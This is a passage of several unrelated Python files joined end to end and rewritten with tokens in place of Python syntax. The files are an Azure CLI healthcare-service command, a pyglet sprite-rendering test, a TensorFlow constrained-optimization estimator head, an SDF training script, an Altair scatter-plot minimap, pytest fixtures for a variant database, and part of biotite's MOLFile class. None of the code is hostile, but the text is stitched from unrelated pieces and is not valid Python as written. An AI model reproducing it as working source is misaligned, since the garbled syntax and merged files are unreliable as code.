self.job_config['TO']]<block_end><return>d<block_end><block_end> |
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
<import_from_stmt>azure.cli.core.util sdk_no_wait<def_stmt>healthcareapis_service_show client resource_group_name resource_name<block_start><return>client.get(resource_group_name=resource_group_name resource_name=resource_name)<block_end># we use this as a create or update
<def_stmt>healthcareapis_service_create client resource_group_name resource_name kind location tags=<none> etag=<none> identity_type=<none> access_policies=<none> cosmos_db_configuration=<none> authentication_configuration=<none> cors_configuration=<none> private_endpoint_connections=<none> public_network_access=<none> export_configuration_storage_account_name=<none> no_wait=<false><block_start>properties={'access_policies':access_policies 'authentication_configuration':authentication_configuration 'cors_configuration':cors_configuration 'cosmos_db_configuration':cosmos_db_configuration 'private_endpoint_connections':private_endpoint_connections 'public_network_access':public_network_access}<if_stmt>export_configuration_storage_account_name<is><not><none><block_start>properties['export_configuration']={'storage_account_name':export_configuration_storage_account_name}<block_end>service_description={'name':resource_name 'kind':kind 'location':location 'etag':etag 'properties':properties 'tags':tags}<if_stmt>identity_type<is><not><none><block_start>service_description['identity']={'principal_id':<none> 'tenant_id':<none> 'type':identity_type }<block_end><else_stmt><block_start>service_description['identity']={'principal_id':<none> 'tenant_id':<none> 'type':"None" }<block_end><return>sdk_no_wait(no_wait client.create_or_update resource_group_name=resource_group_name resource_name=resource_name service_description=service_description)<block_end> |
<import_stmt>pyglet<import_from_stmt>pyglet.gl *<line_sep># pyglet.options['debug_gl_shaders'] = True
window=pyglet.window.Window(width=540 height=540 resizable=<true>)<line_sep>batch=pyglet.graphics.Batch()<line_sep>print("OpenGL Context: {}".format(window.context.get_info().version))<line_sep>##########################################################
# TESTS !
##########################################################
label=pyglet.text.Label("This is a test" x=0 y=180 dpi=200 color=(255 25 255 150) batch=batch)<line_sep>vertex_list=pyglet.graphics.vertex_list(3 ('position3f' (100 300 0 200 250 0 200 350 0)) ('colors4f' (1 0 0 1 0 1 0 1 0.3 0.3 1 1)))<def_stmt>create_quad_vertex_list x y z width height<block_start><return>x y z x+width y z x+width y+height z x y+height z<block_end>batch.add_indexed(4 GL_TRIANGLES <none> [0 1 2 0 2 3] ('position3f' create_quad_vertex_list(480 270 -11 50 50)) ('colors4f' (1 0.5 0.2 1 1 0.5 0.2 1 1 0.5 0.2 1 1 0.5 0.2 1)))<line_sep>batch.add_indexed(4 GL_TRIANGLES <none> [0 1 2 0 2 3] ('position3f' (400 400 0 400+50 400 0 400+50 400+50 0 400 400+50 0)) ('colors4f' (1 0.5 0.2 1 1 0.5 0.2 1 1 0.5 0.2 1 1 0.5 0.2 1)))<line_sep>img=pyglet.image.load("pyglet.png")<line_sep>img.anchor_x=img.width<floordiv>2<line_sep>img.anchor_y=img.height<floordiv>2<line_sep>red=pyglet.image.SolidColorImagePattern((255 0 0 255)).create_image(50 50)<line_sep>green=pyglet.image.SolidColorImagePattern((0 255 0 255)).create_image(50 50)<line_sep>blue=pyglet.image.SolidColorImagePattern((0 0 255 255)).create_image(50 50)<line_sep>white=pyglet.image.SolidColorImagePattern((255 255 255 255)).create_image(50 50)<line_sep>sprites=[pyglet.sprite.Sprite(img=img x=60 y=80 batch=batch) pyglet.sprite.Sprite(img=img x=110 y=90 batch=batch) pyglet.sprite.Sprite(img=img x=160 y=100 batch=batch) pyglet.sprite.Sprite(img=img x=210 y=110 batch=batch)]<for_stmt>sprite sprites<block_start>sprite.opacity=220<block_end>sprite2=pyglet.sprite.Sprite(img=red x=200 y=400 batch=batch)<line_sep>sprite3=pyglet.sprite.Sprite(img=green x=300 y=300 batch=batch)<line_sep>sprite4=pyglet.sprite.Sprite(img=blue x=400 y=200 batch=batch)<line_sep>sprite5=pyglet.sprite.Sprite(img=white x=500 y=100 batch=batch)<line_sep>standalone_sprite=pyglet.sprite.Sprite(img=white x=600 y=0)<line_sep>##########################################################
# Modify the sprite scale value by scrolling the mouse
##########################################################
@window.event<def_stmt>on_mouse_scroll x y mouse direction<block_start><for_stmt>spr sprites<block_start>spr.scale<augadd>direction/10<block_end><block_end>###########################################################
#
###########################################################
@window.event<def_stmt>on_draw <block_start>window.clear()<line_sep># pyglet.graphics.draw(3, GL_TRIANGLES, ('position3f', (100, 100, 0, 200, 100, 0, 150, 200, 0)),
# ('colors3f', (1, 0.5, 0.2, 1, 0.5, 0.2, 1, 0.5, 0.2)))
#
# pyglet.graphics.draw_indexed(4, GL_TRIANGLES, [0, 1, 2, 0, 2, 3],
# ('position2i', (225, 300, 250, 300, 250, 325, 225, 325)),
# ('colors3f', (0.5, 1, 0.2, 0.5, 0.2, 1, 0.2, 0.5, 1, 1, 0.5, 0.2)))
vertex_list.draw(GL_TRIANGLES)<line_sep>batch.draw()<line_sep>standalone_sprite.draw()<block_end><def_stmt>update dt<block_start><for_stmt>sprite sprites<block_start>sprite.rotation<augadd>100<times>dt%360<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>pyglet.gl.glClearColor(0.2 0.3 0.3 1)<line_sep>pyglet.clock.schedule_interval(update 1/60)<line_sep>pyglet.app.run()<block_end> |
# Copyright 2018 The TensorFlow Constrained Optimization Authors. All Rights
# Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# ==============================================================================
"""TFCO estimator head for use with TensorFlow 1.x and 2.x.
The classes `HeadV1` and `HeadV2` allow you to create custom heads that can be
used with a `tf.Estimator` to minimize a constrained minimization problem
in TF 1.x and 2.x respectively. You would need to provide an existing `_Head`
for TF 1.x and a `tf.estimator.Head` for TF 2.x and a function specifying
a constrained minimization problem, and the base head's minimization ops
will be accordingly modified.
Example
=======
Consider a binary classification problem, where we wish to train a
LinearEstimator by minimizing error rate subject to a recall constraint. For
this, we will first create a function that takes "logits", "labels",
"features", and an (optional) "weight_column", and returns the
`RateMinimizationProblem`.
```python
def problem_fn(logits, labels, features, weight_column=None):
context = tfco.rate_context(predictions=logits, labels=labels)
objective=tfco.error_rate(context)
problem = tfco.RateMinimizationProblem(
objective=tfco.error_rate(context),
constraints=[tfco.recall(context) >= 0.9])
return problem
```
In TF 2.x, we will then create a `tfco.HeadV2` instance from a base
`BinaryClassHead` instance and the `problem_fn` defined above.
```python
base_head = tf.estimator.BinaryClassHead()
custom_head = tfco.HeadV2(base_head, problem_fn)
```
The final step is to create a `LinearEstimator` using the custom head.
```python
estimator = tf.estimator.LinearEstimator(head=custom_head, ...)
```
"""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>tensorflow<as>tf<import_from_stmt>tensorflow_constrained_optimization.python.train constrained_optimizer<import_from_stmt>tensorflow_constrained_optimization.python.train lagrangian_optimizer<class_stmt>_WrapperHead(tf.estimator.Head)<block_start>"""Base class for `HeadV1` and `HeadV2`.
This class is a wrapper around an existing base head, which can be either a
V1 `_Head` instance or a V2 `Head` instance. While this class implements the
`tf.estimator.Head` interface provided in TensorFlow 2.x, it can be used to
wrap both a V1 and V2 head instance, as they have similar signatures. Some of
the functions implemented may be relevant for only a V1 or V2 head.
"""<def_stmt>__init__ self base_head problem_fn weight_column=<none><block_start>"""Initializes a `_WrapperHead` instance that wraps the `base_head`.
Args:
base_head: A V1 `_Head` instance or a V2 `tf.estimator.Head` instance.
problem_fn: A function that takes logits, labels and features as input,
and returns a `ConstrainedMinimizationProblem` instance.
weight_column: Optional string or a `NumericColumn` created by
`tf.feature_column.numeric_column` defining feature column representing
weights. It is used to re-weight examples during training. This may be
an optional argument to the base_head, but however needs to be passed
again here as `weight_column` is not usually publicly accessible in the
base_head.
"""<line_sep>self._base_head=base_head<line_sep>self._problem_fn=problem_fn<line_sep>self._weight_column=weight_column<block_end>@property<def_stmt>name self<block_start>"""The name of this head.
Returns:
A string.
"""<line_sep><return>self._base_head.name<block_end>@property<def_stmt>logits_dimension self<block_start>"""Size of the last dimension of the logits `Tensor`.
Often is the number of classes, labels, or real values to be predicted.
Typically, logits is of shape `[batch_size, logits_dimension]`.
Returns:
The expected size of the `logits` tensor.
"""<line_sep><return>self._base_head.logits_dimension<block_end><def_stmt>create_loss self features mode logits labels<block_start>"""Returns a loss Tensor from provided logits.
The returned loss is the same as that of the base head and is meant
solely for book-keeping purposes. We do not return the custom loss used to
create the train_op for constrained optimization, as this loss makes use of
auxilliary variables whose values may not be set properly in EVAL mode. This
function is relevant only for a V1 estimator.
Args:
features: Input `dict` of `Tensor` objects.
mode: Estimator's `ModeKeys`.
logits: logits `Tensor` to be used for loss construction.
labels: Labels `Tensor`, or `dict` of same.
Returns:
`LossSpec`.
"""<line_sep><return>self._base_head.create_loss(labels logits features mode)<block_end>@property<def_stmt>loss_reduction self<block_start>"""One of `tf.losses.Reduction`.
Returns the same value as the base head, and does not reflect how TFCO
aggregates its losses internally. This function is relevant only for a V2
estimator.
Returns:
The type of loss reduction used in the head.
"""<line_sep># TODO: Should we return SUM_OVER_BATCH_SIZE, as this better
# represents TFCO's aggregation strategy, and may be used for rescaling
# purposes during distributed training?
<return>self._base_head.loss_reduction<block_end><def_stmt>predictions self logits keys=<none><block_start>"""Returns a `dict` of predictions from provided logits.
This function is relevant only for a V2 estimator.
Args:
logits: Logits `Tensor` to be used for prediction construction.
keys: A list of `string` for prediction keys. Defaults to `None`, meaning
if not specified, predictions will be created for all the pre-defined
valid keys in the head.
Returns:
A `dict` of predicted `Tensor` keyed by prediction name.
"""<line_sep><return>self._base_head.predictions(logits keys)<block_end><def_stmt>metrics self regularization_losses=<none><block_start>"""Returns a `dict` of metric objects.
This function is relevant only for a V2 estimator.
Args:
regularization_losses: A list of additional scalar losses to be added to
the training loss, such as regularization losses.
Returns:
A `dict` of metrics keyed by string name. The value is an instance of
`Metric` class.
"""<line_sep><return>self._base_head.metrics(regularization_losses)<block_end><def_stmt>update_metrics self eval_metrics features logits labels mode=<none> regularization_losses=<none><block_start>"""Updates metric objects and returns a `dict` of the updated metrics.
This function is relevant only for a V2 estimator.
Args:
eval_metrics: A `dict` of metrics to be updated.
features: Input `dict` mapping string feature names to `Tensor` or
`SparseTensor` objects containing the values for that feature in a
minibatch. Often to be used to fetch example-weight tensor.
logits: logits `Tensor` to be used for metrics update.
labels: Labels `Tensor`, or `dict` mapping string label names to `Tensor`
objects of the label values.
mode: Estimator's `ModeKeys`. In most cases, this arg is not used and can
be removed in the method implementation.
regularization_losses: A list of additional scalar losses to be added to
the training and evaluation loss, such as regularization losses. Note
that, the `mode` arg is not used in the `tf.estimator.Head`. If the
update of the metrics doesn't rely on `mode`, it can be safely ignored
in the method signature.
Returns:
A `dict` of updated metrics keyed by name. The value is an instance of
`Metric` class.
"""<line_sep><return>self._base_head.update_metrics(eval_metrics features logits labels mode regularization_losses)<block_end><def_stmt>loss self labels logits features=<none> mode=<none> regularization_losses=<none><block_start>"""Returns a loss `Tensor` from provided arguments.
The returned loss is the same as that of the base head and is meant
solely for book-keeping purposes. We do not return the custom loss used to
create the train_op for constrained optimization, as this loss makes use of
auxilliary variables whose values may not be set properly in EVAL mode. This
function is relevant for a V2 estimator.
Args:
labels: Labels `Tensor`, or `dict` mapping string label names to `Tensor`
objects of the label values.
logits: Logits `Tensor` to be used for loss construction.
features: Input `dict` mapping string feature names to `Tensor` or
`SparseTensor` objects containing the values for that feature in a
minibatch. Often to be used to fetch example-weight tensor.
mode: Estimator's `ModeKeys`. To be used in case loss calculation is
different in Train and Eval mode.
regularization_losses: A list of additional scalar losses to be added to
the training loss, such as regularization losses.
Returns:
A scalar `Tensor` representing a dummy loss.
"""<line_sep><return>self._base_head.loss(labels logits features mode regularization_losses)<block_end><def_stmt>_create_no_op_estimator_spec self features mode logits labels<block_start>"""Returns `EstimatorSpec` for the base head with no `train_op`."""<line_sep><return>self._base_head.create_estimator_spec(features=features mode=mode logits=logits labels=labels train_op_fn=<lambda>loss:tf.constant(0) regularization_losses=<none>)<block_end><def_stmt>_create_problem_and_update_optimizer self logits labels features optimizer<block_start>"""Returns `ConstrainedMinimizationProblem` created using `_problem_fn`."""<line_sep>problem=self._problem_fn(logits labels features weight_column=self._weight_column)<line_sep># Set the number of constraints in the optimizer. This is needed if
# `num_constraints` hasn't already been specified to the optimizer, and
# will also check that we aren't changing the number of constraints from
# a previously-specified value.
optimizer.num_constraints=problem.num_constraints<line_sep><return>problem<block_end><def_stmt>_append_update_ops self train_op_fn update_ops<block_start>"""Returns `train_op` with control dependency on `update_ops`."""<line_sep># We handle the case of update_ops=None separately because calling
# tf.control_dependencies(None) in graph mode clears existing control
# dependencies.
<if_stmt>update_ops<is><none><block_start>train_op=train_op_fn()<block_end><else_stmt><block_start><with_stmt>tf.control_dependencies(update_ops)<block_start>train_op=train_op_fn()<block_end><block_end><return>train_op<block_end><block_end><class_stmt>HeadV1(_WrapperHead)<block_start>"""A wrapper around an existing V1 `_Head` for use with TensorFlow 1.x.
This head modifies the base head's train_op to minimize a
`ConstrainedMinimizationProblem` specified via `problem_fn`, while
preserving the base head's other functionality. If the estimator's optimizer
is an instance of `ConstrainedOptimizerV1`, it uses the same for minimization.
If not, it creates a `ConstrainedOptimizerV1` instance from the estimator's
optimizer.
"""<def_stmt>__init__ self base_head problem_fn weight_column=<none><block_start>"""Initializes a `HeadV1` instance that wraps the `base_head`.
Args:
base_head: A `_Head` instance.
problem_fn: A function that takes logits, labels and features as input,
and returns a `ConstrainedMinimizationProblem` instance.
weight_column: Optional string or a `NumericColumn` created by
`tf.feature_column.numeric_column` defining feature column representing
weights. It is used to re-weight examples during training. This may be
an optional argument to the base_head, but however needs to be passed
again here as `weight_column` is not usually publicly accessible in the
base_head.
Raises:
ValueError: If a `tf.estimator.Head` instance is passed as the
`base_head`.
"""<if_stmt>isinstance(base_head tf.estimator.Head)<block_start><raise>ValueError("You cannot pass a `tf.estimator.Head` instance as the "<concat>"`base_head` to `HeadV1`.")<block_end>super(HeadV1 self).__init__(base_head problem_fn weight_column)<block_end><def_stmt>create_estimator_spec self features mode logits labels=<none> optimizer=<none> train_op_fn=<none> regularization_losses=<none><block_start>"""Returns `EstimatorSpec` that a model_fn can return.
Args:
features: Input `dict` of `Tensor` or `SparseTensor` objects.
mode: Estimator's `ModeKeys`.
logits: logits `Tensor` to be used by the head.
labels: Optional labels `Tensor`, or `dict` mapping string label names to
`Tensor` objects of the label values.
optimizer: A `ConstrainedOptimizerV1` or a `tf.compat.v1.train.Optimizer`.
instance. If a `tf.compat.v1.train.Optimizer` is provided, the head
creates a `ConstrainedOptimizerV1` that wraps it. This is an optional
argument in the `_Head` base class, but needs to be passed here.
train_op_fn: This argument is ignored and can be left unspecified.
regularization_losses: This argument is ignored and can be left
unspecified.
Returns:
`EstimatorSpec`.
"""<line_sep>estimator_spec=self._create_no_op_estimator_spec(features=features mode=mode logits=logits labels=labels)<line_sep># When mode is PREDICT or EVAL, no modification needed to the base head.
<if_stmt>(mode<eq>tf.estimator.ModeKeys.PREDICT)<or>(mode<eq>tf.estimator.ModeKeys.EVAL)<block_start><return>estimator_spec<block_end># When mode is TRAIN, replace train_op in estimator_spec.
<if_stmt>mode<eq>tf.estimator.ModeKeys.TRAIN<block_start><if_stmt>optimizer<is><none><block_start><raise>ValueError("You must provide an optimizer to the estimator.")<block_end># TODO: Add support for passing train_op_fn.
# If the optimizer is not a `ConstrainedOptimizerV1` instance, then
# create a `LagrangianOptimizerV1` that wraps the base heads's optimizer.
<if_stmt><not>isinstance(optimizer constrained_optimizer.ConstrainedOptimizerV1)<block_start>optimizer=lagrangian_optimizer.LagrangianOptimizerV1(optimizer)<block_end>problem=self._create_problem_and_update_optimizer(logits labels features optimizer)<line_sep># Create `train_op` with a control dependency on `UPDATE_OPS`.
update_ops=tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.UPDATE_OPS)<line_sep>global_step=tf.compat.v1.train.get_global_step()<line_sep>train_op=self._append_update_ops(<lambda>:optimizer.minimize(problem global_step=global_step) update_ops)<line_sep><return>estimator_spec._replace(train_op=train_op)<block_end><raise>ValueError("mode={} not recognized".format(mode))<block_end><block_end><class_stmt>HeadV2(_WrapperHead)<block_start>"""A wrapper around an existing V2 `Head` for use with TensorFlow 2.x.
This head modifies the base head's train_op to minimize a
`ConstrainedMinimizationProblem` specified via `problem_fn`, while
preserving the base head's other functionality. If the estimator's optimizer
is an instance of `ConstrainedOptimizerV2`, it uses the same for minimization.
If not, it creates a `ConstrainedOptimizerV2` instance from the estimator's
optimizer.
"""<def_stmt>__init__ self base_head problem_fn weight_column=<none><block_start>"""Initializes a `HeadV2` instance that wraps the `base_head`.
Args:
base_head: A `tf.estimator.Head` instance.
problem_fn: A function that takes logits, labels and features as input,
and returns a `ConstrainedMinimizationProblem` instance.
weight_column: Optional string or a `NumericColumn` created by
`tf.feature_column.numeric_column` defining feature column representing
weights. It is used to re-weight examples during training. This may be
an optional argument to the base_head, but however needs to be passed
again here as `weight_column` is not usually publicly accessible in the
base_head.
Raises:
ValueError: If a `tf.estimator.Head` instance is not passed as
the `base_head`.
"""<if_stmt><not>isinstance(base_head tf.estimator.Head)<block_start><raise>ValueError("You must pass a `tf.estimator.Head` instance as "<concat>"`base_head` to `HeadV2`.")<block_end>super(HeadV2 self).__init__(base_head problem_fn weight_column)<block_end><def_stmt>create_estimator_spec self features mode logits labels=<none> optimizer=<none> trainable_variables=<none> train_op_fn=<none> update_ops=<none> regularization_losses=<none><block_start>"""Returns `EstimatorSpec` for constrained optimization.
The `EstimatorSpec` is the same as that of the base head with the
`train_op` alone replaced with one for minimizing the constrained
minimization problem specified by self._problem_fn.
Args:
features: Input `dict` mapping string feature names to `Tensor` or
`SparseTensor` objects containing the values for that feature in a
minibatch. Often to be used to fetch example-weight tensor.
mode: Estimator's `ModeKeys`.
logits: Logits `Tensor` to be used by the head.
labels: Optional labels `Tensor`, or `dict` mapping string label names to
`Tensor` objects of the label values.
optimizer: A `ConstrainedOptimizerV2` or a `tf.keras.optimizers.Optimizer`
instance. If a `tf.keras.optimizers.Optimizer` is provided, the head
creates a `ConstrainedOptimizerV2` that wraps it. This is an optional
argument in the `tf.estimator.Head` base class, but needs to be passed
here.
trainable_variables: A list or tuple of `Variable` objects to update to
solve the constrained minimization problem. In Tensorflow 1.x, by
default these are the list of variables collected in the graph under the
key `GraphKeys.TRAINABLE_VARIABLES`. As Tensorflow 2.x doesn't have
collections and GraphKeys, trainable_variables needs to be passed
explicitly here.
train_op_fn: This argument is ignored and can be left unspecified.
update_ops: Optional list or tuple of update ops to be run at training
time. For example, layers such as BatchNormalization create mean and
variance update ops that need to be run at training time. In Tensorflow
1.x, these are thrown into an UPDATE_OPS collection. As Tensorflow 2.x
doesn't have collections, update_ops needs to be passed explicitly here.
regularization_losses: This argument is ignored and can be left
unspecified.
Returns:
`EstimatorSpec`.
Raises:
ValueError: If mode is not recognized or optimizer is not specified in
TRAIN mode.
"""<line_sep>estimator_spec=self._create_no_op_estimator_spec(features=features mode=mode logits=logits labels=labels)<line_sep># When mode is PREDICT or EVAL, no modification needed to the base head.
<if_stmt>(mode<eq>tf.estimator.ModeKeys.PREDICT)<or>(mode<eq>tf.estimator.ModeKeys.EVAL)<block_start><return>estimator_spec<block_end># When mode is TRAIN, replace train_op in estimator_spec.
<if_stmt>mode<eq>tf.estimator.ModeKeys.TRAIN<block_start><if_stmt>optimizer<is><none><block_start><raise>ValueError("You must provide an optimizer to the estimator.")<block_end># TODO: Add support for passing train_op_fn.
# If the optimizer is not a `ConstrainedOptimizerV2` instance, then
# create a `LagrangianOptimizer` that wraps the base heads's optimizer.
<if_stmt><not>isinstance(optimizer constrained_optimizer.ConstrainedOptimizerV2)<block_start>iterations=optimizer.iterations<line_sep>optimizer=lagrangian_optimizer.LagrangianOptimizerV2(optimizer)<line_sep># Pass the iterations member (which contains the global step) in the
# base head's optimizer to the newly created one.
optimizer.iterations=iterations<block_end>problem=self._create_problem_and_update_optimizer(logits labels features optimizer)<line_sep># Create `train_op` with a control dependency on the `update_ops`.
var_list=trainable_variables+list(problem.trainable_variables)+optimizer.trainable_variables()<line_sep>train_op=self._append_update_ops(<lambda>:tf.group(optimizer.get_updates(problem var_list)) update_ops)<line_sep><return>estimator_spec._replace(train_op=train_op)<block_end><raise>ValueError("mode={} not recognized".format(mode))<block_end><block_end> |
<import_stmt>torch<import_stmt>argparse<import_from_stmt>sdf.utils *<if_stmt>__name__<eq>'__main__'<block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('path' type=str)<line_sep>parser.add_argument('--test' action='store_true' help="test mode")<line_sep>parser.add_argument('--workspace' type=str default='workspace')<line_sep>parser.add_argument('--seed' type=int default=0)<line_sep>parser.add_argument('--lr' type=float default=1e-4 help="initial learning rate")<line_sep>parser.add_argument('--fp16' action='store_true' help="use amp mixed precision training")<line_sep>parser.add_argument('--ff' action='store_true' help="use fully-fused MLP")<line_sep>parser.add_argument('--tcnn' action='store_true' help="use TCNN backend")<line_sep>opt=parser.parse_args()<line_sep>print(opt)<line_sep>seed_everything(opt.seed)<if_stmt>opt.ff<block_start><assert_stmt>opt.fp16 "fully-fused mode must be used with fp16 mode"<import_from_stmt>sdf.netowrk_ff SDFNetwork<block_end><elif_stmt>opt.tcnn<block_start><assert_stmt>opt.fp16 "tcnn mode must be used with fp16 mode"<import_from_stmt>sdf.network_tcnn SDFNetwork<block_end><else_stmt><block_start><import_from_stmt>sdf.netowrk SDFNetwork<block_end>model=SDFNetwork(encoding="hashgrid")<line_sep>print(model)<if_stmt>opt.test<block_start>trainer=Trainer('ngp' model workspace=opt.workspace fp16=opt.fp16 use_checkpoint='best' eval_interval=1)<line_sep>trainer.save_mesh(os.path.join(opt.workspace 'results' 'output.ply') 1024)<block_end><else_stmt><block_start><import_from_stmt>sdf.provider SDFDataset<import_from_stmt>loss mape_loss<line_sep>train_dataset=SDFDataset(opt.path size=100 num_samples=2<power>18)<line_sep>train_loader=torch.utils.data.DataLoader(train_dataset batch_size=1 shuffle=<true>)<line_sep>valid_dataset=SDFDataset(opt.path size=1 num_samples=2<power>18)# just a dummy
valid_loader=torch.utils.data.DataLoader(valid_dataset batch_size=1)<line_sep>criterion=mape_loss# torch.nn.L1Loss()
optimizer=<lambda>model:torch.optim.Adam([{'name':'encoding' 'params':model.encoder.parameters()} {'name':'net' 'params':model.backbone.parameters() 'weight_decay':1e-6} ] lr=opt.lr betas=(0.9 0.99) eps=1e-15)<line_sep>scheduler=<lambda>optimizer:optim.lr_scheduler.StepLR(optimizer step_size=10 gamma=0.1)<line_sep>trainer=Trainer('ngp' model workspace=opt.workspace optimizer=optimizer criterion=criterion ema_decay=0.95 fp16=opt.fp16 lr_scheduler=scheduler use_checkpoint='latest' eval_interval=1)<line_sep>trainer.train(train_loader valid_loader 20)<line_sep># also test
trainer.save_mesh(os.path.join(opt.workspace 'results' 'output.ply') 1024)<block_end><block_end> |
"""
Scatter Plot with Minimap
-------------------------
This example shows how to create a miniature version of a plot
such that creating a selection in the miniature version
adjusts the axis limits in another, more detailed view.
"""<line_sep># category: scatter plots
<import_stmt>altair<as>alt<import_from_stmt>vega_datasets data<line_sep>source=data.seattle_weather()<line_sep>zoom=alt.selection_interval(encodings=["x" "y"])<line_sep>minimap=(alt.Chart(source).mark_point().add_selection(zoom).encode(x="date:T" y="temp_max:Q" color=alt.condition(zoom "weather" alt.value("lightgray")) ).properties(width=200 height=200 title="Minimap -- click and drag to zoom in the detail view" ))<line_sep>detail=(alt.Chart(source).mark_point().encode(x=alt.X("date:T" scale=alt.Scale(domain={"selection":zoom.name "encoding":"x"})) y=alt.Y("temp_max:Q" scale=alt.Scale(domain={"selection":zoom.name "encoding":"y"}) ) color="weather" ).properties(width=600 height=400 title="Seattle weather -- detail view"))<line_sep>detail|minimap<line_sep> |
<import_from_stmt>copy deepcopy<import_stmt>pytest<line_sep>@pytest.fixture<def_stmt>real_oldcase_database real_panel_database parsed_case# add case with old case id construct
<block_start>config_data=deepcopy(parsed_case)<line_sep>config_data["case_id"]="-".join([config_data["owner"] config_data["display_name"]])<line_sep>case_obj=real_panel_database.load_case(config_data)<line_sep># add suspect and causative!
institute_obj=real_panel_database.institute(case_obj["owner"])<line_sep>user_obj=real_panel_database.users()[0]<line_sep>variant_obj=real_panel_database.variant_collection.find_one()<line_sep>real_panel_database.pin_variant(institute=institute_obj case=case_obj user=user_obj link="" variant=variant_obj )<line_sep>real_panel_database.mark_causative(institute=institute_obj case=case_obj user=user_obj link="" variant=variant_obj )<line_sep># add ACMG evaluation
real_panel_database.submit_evaluation(variant_obj=variant_obj user_obj=user_obj institute_obj=institute_obj case_obj=case_obj link="" criteria=[{"term":"PS1"} {"term":"PM1"}] )<line_sep># add comment on a variant
real_panel_database.comment(institute=institute_obj case=case_obj user=user_obj link="" variant=variant_obj comment_level="specific" )<line_sep><yield>{"adapter":real_panel_database "variant":variant_obj "case":real_panel_database.case(case_obj["_id"]) }<block_end>@pytest.fixture<def_stmt>parsed_gene <block_start>gene_info={"hgnc_id":1 "hgnc_symbol":"AAA" "ensembl_id":"ENSG1" "chrom":"1" "start":10 "end":100 "build":"37" }<line_sep><return>gene_info<block_end> |
# This source code is part of the Biotite package and is distributed
# under the 3-Clause BSD License. Please see 'LICENSE.rst' for further
# information.
__name__="biotite.structure.io.mol"<line_sep>__author__="<NAME>"<line_sep>__all__=["MOLFile"]<import_stmt>datetime<import_from_stmt>warnings warn<import_stmt>numpy<as>np<import_from_stmt>...atoms AtomArray<import_from_stmt>....file TextFile InvalidFileError<import_from_stmt>...error BadStructureError<import_from_stmt>..ctab read_structure_from_ctab write_structure_to_ctab<line_sep># Number of header lines
N_HEADER=3<line_sep>DATE_FORMAT="%d%m%y%H%M"<class_stmt>MOLFile(TextFile)<block_start>"""
This class represents a file in MOL format, that is used to store
structure information for small molecules. :footcite:`Dalby1992`
Since its use is intended for single small molecules, it stores
less atom annotation information than the macromolecular structure
formats:
Only the atom positions, charges, elements and bonds can be read
from the file, chain and and residue information is missing.
This class can also be used to parse the first structure from an SDF
file, as the SDF format extends the MOL format.
References
----------
.. footbibliography::
Examples
--------
>>> from os.path import join
>>> mol_file = MOLFile.read(join(path_to_structures, "molecules", "TYR.sdf"))
>>> atom_array = mol_file.get_structure()
>>> print(atom_array)
0 N 1.320 0.952 1.428
0 C -0.018 0.429 1.734
0 C -0.103 0.094 3.201
0 O 0.886 -0.254 3.799
0 C -0.274 -0.831 0.907
0 C -0.189 -0.496 -0.559
0 C 1.022 -0.589 -1.219
0 C -1.324 -0.102 -1.244
0 C 1.103 -0.282 -2.563
0 C -1.247 0.210 -2.587
0 C -0.032 0.118 -3.252
0 O 0.044 0.420 -4.574
0 O -1.279 0.184 3.842
0 H 1.977 0.225 1.669
0 H 1.365 1.063 0.426
0 H -0.767 1.183 1.489
0 H 0.473 -1.585 1.152
0 H -1.268 -1.219 1.134
0 H 1.905 -0.902 -0.683
0 H -2.269 -0.031 -0.727
0 H 2.049 -0.354 -3.078
0 H -2.132 0.523 -3.121
0 H -0.123 -0.399 -5.059
0 H -1.333 -0.030 4.784
"""<def_stmt>__init__ self<block_start>super().__init__()<line_sep># empty header lines
self.lines=[""]<times>N_HEADER<block_end><def_stmt>get_header self<block_start>"""
Get the header from the MOL file.
Returns
-------
mol_name : str
The name of the molecule.
initials : str
The author's initials.
program : str
The program name.
time : datetime
The time of file creation.
dimensions : str
Dimensional codes.
scaling_factors : str
Scaling factors.
energy : str
Energy from modeling program.
registry_number : str
MDL registry number.
comments : str
Additional comments.
"""<line_sep>mol_name=self.lines[0].strip()<line_sep>initials=self.lines[1][0:2].strip()<line_sep>program=self.lines[1][2:10].strip()<line_sep>time=datetime.datetime.strptime(self.lines[1][10:20] DATE_FORMAT)<line_sep>dimensions=self.lines[1][20:22].strip()<line_sep>scaling_factors=self.lines[1][22:34].strip()<line_sep>energy=self.lines[1][34:46].strip()<line_sep>registry_number=self.lines[1][46:52].strip()<line_sep>comments=self.lines[2].strip()<line_sep><return>mol_name initials program time dimensions scaling_factors energy registry_number comments<block_end><def_stmt>set_header self mol_name initials="" program="" time=<none> dimensions="" scaling_factors="" energy="" registry_number="" comments=""<block_start>"""
Set the header for the MOL file.
Parameters
----------
mol_name : str
The name of the molecule.
initials : str, optional
The author's initials. Maximum length is 2.
program : str, optional
The program name. Maximum length is 8.
time : datetime or date, optional
The time of file creation.
dimensions : str, optional
Dimensional codes. Maximum length is 2.
scaling_factors : str, optional
Scaling factors. Maximum length is 12.
energy : str, optional
Energy from modeling program. Maximum length is 12.
registry_number : str, optional
MDL registry number. Maximum length is 6.
comments : str, optional
Additional comments.
"""<if_stmt>time<is><none><block_start>time=datetime.datetime.now()<block_end>time_str=time.strftime(DATE_FORMAT)<line_sep>self.lines[0]=str(mol_name)<line_sep>self.lines[1]=(f"{initials:>2}"<concat>f"{program:>8}"<concat>f"{time_str:>10}"<concat>f"{dimensions:>2}"<concat>f"{scaling_factors:>12}"<concat>f"{energy:>12}"<concat>f"{registry_number:>6}")<line_sep>self.lines[2]=str(comments)<block_end><def_stmt>get_structure self<block_start>"""
Get an :class:`AtomArray` from the MOL file.
Returns
-------
array : AtomArray
This :class:`AtomArray` contains the optional ``charge``
annotation and has an associated :class:`BondList`.
All other annotation categories, except ``element`` are
empty.
